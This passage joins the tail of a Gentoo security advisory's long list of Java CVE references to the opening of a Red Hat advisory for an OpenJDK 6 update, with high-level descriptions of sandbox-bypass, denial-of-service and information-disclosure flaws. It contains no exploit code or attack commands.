http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 4 ] CVE-2012-0498\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498\n[ 5 ] CVE-2012-0499\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499\n[ 6 ] CVE-2012-0500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500\n[ 7 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 8 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 9 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 10 ] CVE-2012-0504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504\n[ 11 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 12 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 13 ] CVE-2012-0507\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507\n[ 14 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 15 ] CVE-2012-1531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531\n[ 16 ] CVE-2012-1532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532\n[ 17 ] CVE-2012-1533\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533\n[ 18 ] CVE-2012-1541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541\n[ 19 ] CVE-2012-1682\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682\n[ 20 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 21 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 22 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 23 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 24 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 25 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 26 ] CVE-2012-1721\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721\n[ 27 ] CVE-2012-1722\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722\n[ 28 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 29 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 30 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 31 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 32 ] CVE-2012-3136\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136\n[ 33 ] CVE-2012-3143\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143\n[ 34 ] CVE-2012-3159\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159\n[ 35 ] CVE-2012-3174\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174\n[ 36 ] CVE-2012-3213\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213\n[ 37 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 38 ] CVE-2012-3342\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342\n[ 39 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 40 ] CVE-2012-4681\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681\n[ 41 ] CVE-2012-5067\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067\n[ 42 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 43 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 44 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 45 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 46 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 47 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 48 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 49 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 50 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 51 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 52 ] CVE-2012-5079\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079\n[ 53 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 54 ] CVE-2012-5083\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083\n[ 55 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 56 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 57 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 58 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 59 ] CVE-2012-5088\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088\n[ 60 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 61 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 62 ] CVE-2013-0351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351\n[ 63 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 64 ] CVE-2013-0402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402\n[ 65 ] CVE-2013-0409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409\n[ 66 ] CVE-2013-0419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419\n[ 67 ] CVE-2013-0422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422\n[ 68 ] CVE-2013-0423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423\n[ 69 ] CVE-2013-0430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430\n[ 70 ] CVE-2013-0437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437\n[ 71 ] CVE-2013-0438\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438\n[ 72 ] CVE-2013-0445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445\n[ 73 ] CVE-2013-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446\n[ 74 ] CVE-2013-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448\n[ 75 ] CVE-2013-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449\n[ 76 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 77 ] CVE-2013-1473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473\n[ 78 ] CVE-2013-1479\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479\n[ 79 ] CVE-2013-1481\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481\n[ 80 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 81 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 82 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 83 ] CVE-2013-1487\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487\n[ 84 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 85 ] CVE-2013-1491\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491\n[ 86 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 87 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 88 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 89 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 90 ] CVE-2013-1540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540\n[ 91 ] CVE-2013-1557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557\n[ 92 ] CVE-2013-1558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558\n[ 93 ] CVE-2013-1561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561\n[ 94 ] CVE-2013-1563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563\n[ 95 ] CVE-2013-1564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564\n[ 96 ] CVE-2013-1569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569\n[ 97 ] CVE-2013-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571\n[ 98 ] CVE-2013-2383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383\n[ 99 ] CVE-2013-2384\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384\n[ 100 ] CVE-2013-2394\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394\n[ 101 ] CVE-2013-2400\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400\n[ 102 ] CVE-2013-2407\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407\n[ 103 ] CVE-2013-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412\n[ 104 ] CVE-2013-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414\n[ 105 ] CVE-2013-2415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415\n[ 106 ] CVE-2013-2416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416\n[ 107 ] CVE-2013-2417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417\n[ 108 ] CVE-2013-2418\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418\n[ 109 ] CVE-2013-2419\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419\n[ 110 ] CVE-2013-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420\n[ 111 ] CVE-2013-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421\n[ 112 ] CVE-2013-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422\n[ 113 ] CVE-2013-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423\n[ 114 ] CVE-2013-2424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424\n[ 115 ] CVE-2013-2425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425\n[ 116 ] CVE-2013-2426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426\n[ 117 ] CVE-2013-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427\n[ 118 ] CVE-2013-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428\n[ 119 ] CVE-2013-2429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429\n[ 120 ] CVE-2013-2430\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430\n[ 121 ] CVE-2013-2431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431\n[ 122 ] CVE-2013-2432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432\n[ 123 ] CVE-2013-2433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433\n[ 124 ] CVE-2013-2434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434\n[ 125 ] CVE-2013-2435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435\n[ 126 ] CVE-2013-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436\n[ 127 ] CVE-2013-2437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437\n[ 128 ] CVE-2013-2438\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438\n[ 129 ] CVE-2013-2439\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439\n[ 130 ] CVE-2013-2440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440\n[ 131 ] CVE-2013-2442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442\n[ 132 ] CVE-2013-2443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443\n[ 133 ] CVE-2013-2444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444\n[ 134 ] CVE-2013-2445\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445\n[ 135 ] CVE-2013-2446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446\n[ 136 ] CVE-2013-2447\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447\n[ 137 ] CVE-2013-2448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448\n[ 138 ] CVE-2013-2449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449\n[ 139 ] CVE-2013-2450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450\n[ 140 ] CVE-2013-2451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451\n[ 141 ] CVE-2013-2452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452\n[ 142 ] CVE-2013-2453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453\n[ 143 ] CVE-2013-2454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454\n[ 144 ] CVE-2013-2455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455\n[ 145 ] CVE-2013-2456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456\n[ 146 ] CVE-2013-2457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457\n[ 147 ] CVE-2013-2458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458\n[ 148 ] CVE-2013-2459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459\n[ 149 ] CVE-2013-2460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460\n[ 150 ] CVE-2013-2461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461\n[ 151 ] CVE-2013-2462\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462\n[ 152 ] CVE-2013-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463\n[ 153 ] CVE-2013-2464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464\n[ 154 ] CVE-2013-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465\n[ 155 ] CVE-2013-2466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466\n[ 156 ] CVE-2013-2467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467\n[ 157 ] CVE-2013-2468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468\n[ 158 ] CVE-2013-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469\n[ 159 ] CVE-2013-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470\n[ 160 ] CVE-2013-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471\n[ 161 ] CVE-2013-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472\n[ 162 ] CVE-2013-2473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473\n[ 163 ] CVE-2013-3743\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743\n[ 164 ] CVE-2013-3744\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744\n[ 165 ] CVE-2013-3829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829\n[ 166 ] CVE-2013-5772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772\n[ 167 ] CVE-2013-5774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774\n[ 168 ] CVE-2013-5775\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775\n[ 169 ] CVE-2013-5776\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776\n[ 170 ] CVE-2013-5777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777\n[ 171 ] CVE-2013-5778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778\n[ 172 ] CVE-2013-5780\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780\n[ 173 ] CVE-2013-5782\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782\n[ 174 ] CVE-2013-5783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783\n[ 175 ] CVE-2013-5784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784\n[ 176 ] CVE-2013-5787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787\n[ 177 ] CVE-2013-5788\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788\n[ 178 ] CVE-2013-5789\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789\n[ 179 ] CVE-2013-5790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790\n[ 180 ] CVE-2013-5797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797\n[ 181 ] CVE-2013-5800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800\n[ 182 ] CVE-2013-5801\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801\n[ 183 ] CVE-2013-5802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802\n[ 184 ] CVE-2013-5803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803\n[ 185 ] CVE-2013-5804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804\n[ 186 ] CVE-2013-5805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805\n[ 187 ] CVE-2013-5806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806\n[ 188 ] CVE-2013-5809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809\n[ 189 ] CVE-2013-5810\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810\n[ 190 ] CVE-2013-5812\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812\n[ 191 ] CVE-2013-5814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814\n[ 192 ] CVE-2013-5817\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817\n[ 193 ] CVE-2013-5818\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818\n[ 194 ] CVE-2013-5819\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819\n[ 195 ] CVE-2013-5820\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820\n[ 196 ] CVE-2013-5823\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823\n[ 197 ] CVE-2013-5824\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824\n[ 198 ] CVE-2013-5825\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825\n[ 199 ] CVE-2013-5829\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829\n[ 200 ] CVE-2013-5830\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830\n[ 201 ] CVE-2013-5831\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831\n[ 202 ] CVE-2013-5832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832\n[ 203 ] CVE-2013-5838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838\n[ 204 ] CVE-2013-5840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840\n[ 205 ] CVE-2013-5842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842\n[ 206 ] CVE-2013-5843\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843\n[ 207 ] CVE-2013-5844\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844\n[ 208 ] CVE-2013-5846\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846\n[ 209 ] CVE-2013-5848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848\n[ 210 ] CVE-2013-5849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849\n[ 211 ] CVE-2013-5850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850\n[ 212 ] CVE-2013-5851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851\n[ 213 ] CVE-2013-5852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852\n[ 214 ] CVE-2013-5854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854\n[ 215 ] CVE-2013-5870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870\n[ 216 ] CVE-2013-5878\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878\n[ 217 ] CVE-2013-5887\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887\n[ 218 ] CVE-2013-5888\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888\n[ 219 ] CVE-2013-5889\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889\n[ 220 ] CVE-2013-5893\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893\n[ 221 ] CVE-2013-5895\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895\n[ 222 ] CVE-2013-5896\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896\n[ 223 ] CVE-2013-5898\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898\n[ 224 ] CVE-2013-5899\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899\n[ 225 ] CVE-2013-5902\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902\n[ 226 ] CVE-2013-5904\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904\n[ 227 ] CVE-2013-5905\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905\n[ 228 ] CVE-2013-5906\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906\n[ 229 ] CVE-2013-5907\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907\n[ 230 ] CVE-2013-5910\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910\n[ 231 ] CVE-2014-0368\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368\n[ 232 ] CVE-2014-0373\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373\n[ 233 ] CVE-2014-0375\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375\n[ 234 ] CVE-2014-0376\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376\n[ 235 ] CVE-2014-0382\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382\n[ 236 ] CVE-2014-0385\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385\n[ 237 ] CVE-2014-0387\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387\n[ 238 ] CVE-2014-0403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403\n[ 239 ] CVE-2014-0408\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408\n[ 240 ] CVE-2014-0410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410\n[ 241 ] CVE-2014-0411\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411\n[ 242 ] CVE-2014-0415\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415\n[ 243 ] CVE-2014-0416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416\n[ 244 ] CVE-2014-0417\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417\n[ 245 ] CVE-2014-0418\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418\n[ 246 ] CVE-2014-0422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422\n[ 247 ] CVE-2014-0423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423\n[ 248 ] CVE-2014-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424\n[ 249 ] CVE-2014-0428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201401-30.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.6.0-openjdk security update\nAdvisory ID: RHSA-2012:1384-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-1384.html\nIssue date: 2012-10-17\nCVE Names: CVE-2012-3216 CVE-2012-4416 CVE-2012-5068 \n CVE-2012-5069 CVE-2012-5071 CVE-2012-5072 \n CVE-2012-5073 CVE-2012-5075 CVE-2012-5077 \n CVE-2012-5079 CVE-2012-5081 CVE-2012-5084 \n CVE-2012-5085 CVE-2012-5086 CVE-2012-5089 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. \n\nMultiple improper permission check issues were discovered in the Beans,\nSwing, and JMX components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions. \n(CVE-2012-5086, CVE-2012-5084, CVE-2012-5089)\n\nMultiple improper permission check issues were discovered in the Scripting,\nJMX, Concurrency, Libraries, and Security components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2012-5068, CVE-2012-5071,\nCVE-2012-5069, CVE-2012-5073, CVE-2012-5072)\n\nIt was discovered that java.util.ServiceLoader could create an instance of\nan incompatible class while performing provider lookup. An untrusted Java\napplication or applet could use this flaw to bypass certain Java sandbox\nrestrictions. (CVE-2012-5079)\n\nIt was discovered that the Java Secure Socket Extension (JSSE) SSL/TLS\nimplementation did not properly handle handshake records containing an\noverly large data length value. An unauthenticated, remote attacker could\npossibly use this flaw to cause an SSL/TLS server to terminate with an\nexception. (CVE-2012-5081)\n\nIt was discovered that the JMX component in OpenJDK could perform certain\nactions in an insecure manner. An untrusted Java application or applet\ncould possibly use this flaw to disclose sensitive information. \n(CVE-2012-5075)\n\nA bug in the Java HotSpot Virtual Machine optimization code could cause it\nto not perform array initialization in certain cases. An untrusted Java\napplication or applet could use this flaw to disclose portions of the\nvirtual machine\u0027s memory. (CVE-2012-4416)\n\nIt was discovered that the SecureRandom class did not properly protect\nagainst the creation of multiple seeders. An untrusted Java application or\napplet could possibly use this flaw to disclose sensitive information. 